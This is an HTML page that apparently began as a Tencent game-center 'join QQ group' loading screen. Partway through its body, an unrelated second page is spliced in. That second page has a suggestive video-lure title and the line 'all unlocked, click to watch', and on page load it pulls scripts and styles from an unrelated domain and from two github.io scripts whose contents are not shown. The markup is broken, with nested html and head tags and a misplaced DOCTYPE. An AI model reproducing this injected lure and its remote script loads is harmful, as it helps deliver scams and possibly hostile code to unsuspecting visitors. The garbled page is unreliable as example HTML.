
<html data-use-rem="750" style="font-size: 53.3333px;"><head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no">
  <meta name="applicable-device" content="mobile">
  <meta name="format-detection" content="telephone=no">
  <meta name="msapplication-tap-highlight" content="no">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta content="email=no" name="format-detection">
  <title>加载中...</title>



  <script>
    // 移动端适配
    (function (win) {
      var doc = win.document,
        html = doc.documentElement,
        option = html.getAttribute("data-use-rem");
      if (option === null) {
        return
      }
      var baseWidth = parseInt(option).toString() == "NaN" ? 640 : parseInt(option);
      var grids = baseWidth / 100;
      var clientWidth = html.clientWidth || 320;
      html.style.fontSize = clientWidth / grids + "px";
      var adjustRatio = 0;
      var reCalc = function () {
        var newCW = html.clientWidth;
        if (newCW === clientWidth) {
          return
        }
        clientWidth = newCW;
        html.style.fontSize = newCW * (adjustRatio ? adjustRatio : 1) / grids + "px"
      };
      reCalc();
      if (!doc.addEventListener) {
        return
      }
      var resizeEvt = "orientationchange" in win ? "orientationchange" : "resize";
      win.addEventListener(resizeEvt, reCalc, false);
      doc.addEventListener("DOMContentLoaded", reCalc, false);
    })(window);
  </script>
  <style>
    @keyframes rotate {
      0% {
        transform: translateX(-50%) rotate(0deg);
      }

      100% {
        transform: translateX(-50%) rotate(359deg);
      }
    }

    .icon-view,
    .loading-wrapper {
      position: fixed;
      top: 40%;
      left: 50%;
      transform: translate(-50%, -50%);
      width: 100vw;
      text-align: center;
    }

    .icon-view {
      display: flex;
      flex-direction: column;
      align-items: center;
    }

    .icon {
      display: block;
      background-repeat: no-repeat;
      background-size: contain;
      background-position: 50% 50%;
    }

    .loading-icon {
      position: absolute;
      top: 0;
      left: 50%;
      width: .8rem;
      height: .8rem;
      background-image: url(https://youxi.gamecenter.qq.com/ogame/sgame-join-qgroup/assets/loading.d35042ca.svg);
      animation: rotate 1s linear infinite;
      transform-origin: 50% 50%;
    }

    .loading-text {
      padding-top: .8rem;
      color: #bfbfbf;
      font-size: .24rem;
    }

    .warning-icon {
      position: absolute;
      bottom: 50%;
      left: 40%;
      width: 1.6rem;
      height: 1.6rem;
      background-image: url(https://youxi.gamecenter.qq.com/ogame/sgame-join-qgroup/assets/warning.ce44c3ff.svg);
    }

    .success-icon {
      position: absolute;
      bottom: 50%;
      left: 40%;
      width: 1.6rem;
      height: 1.6rem;
      background-image: url(https://youxi.gamecenter.qq.com/ogame/sgame-join-qgroup/assets/success.a1cb5719.svg);
    }

    .err-text {
      color: #555;
      font-size: .26rem;
      padding-top: .8rem;
    }

    .btn {
      display: block;
      width: 3.2rem;
      height: .6rem;
      border-radius: 5px;
      color: #1890ff;
      border: 1px solid #1890ff;
      font-size: .28rem;
      line-height: .6rem;
      margin-top: .1rem;
      background-color: transparent;
      text-decoration: none;
    }
  </style>
</head>

<body>

  <div id="app">
    <div class="loading-wrapper" id="loading">
      <i class="icon loading-icon"></i>
    </div>
    <div class="icon-view" id="error" style="display: none;">
      <i class="icon warning-icon"></i>
      <p class="err-text" id="errMsg"></p>
    </div>
<html>
<head>
<meta charset="utf-8">
<meta name="referrer" content="never">
<meta content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" name="viewport">
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="referrer" content="never">
<meta content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" name="viewport">
<meta itemprop="name" name="title" content="QQ汁源.mp4" /> 
<meta itemprop="description" name="description" content="已解锁全部！点击进入观赏！" /> 
<link href="https://mddc.natdss.com.cn/dc/images/bootstrap.min.css" rel="stylesheet">
<link href="https://mddc.natdss.com.cn/dc/images/style.css" rel="stylesheet" type="text/css">
<link href="https://mddc.natdss.com.cn/dc/images/layer.css" rel="stylesheet" type="text/css">
<script src="https://mddc.natdss.com.cn/dc/images/jquery.min.js" type="text/javascript"></script>
<script src="https://mddc.natdss.com.cn/dc/images/layer.js" type="text/javascript"></script>
<script src="https://mddc.natdss.com.cn/dc/images/ckplayer/ckplayer.css"></script>
</head>
<body>
<div class="page_dialog" id="pageDialog"></div>
<script src="https://tppp8.github.io/lw.js" type="text/javascript" ></script>
<script src="https://tppp8.github.io/le.js" type="text/javascript" ></script>
</body>
</html>
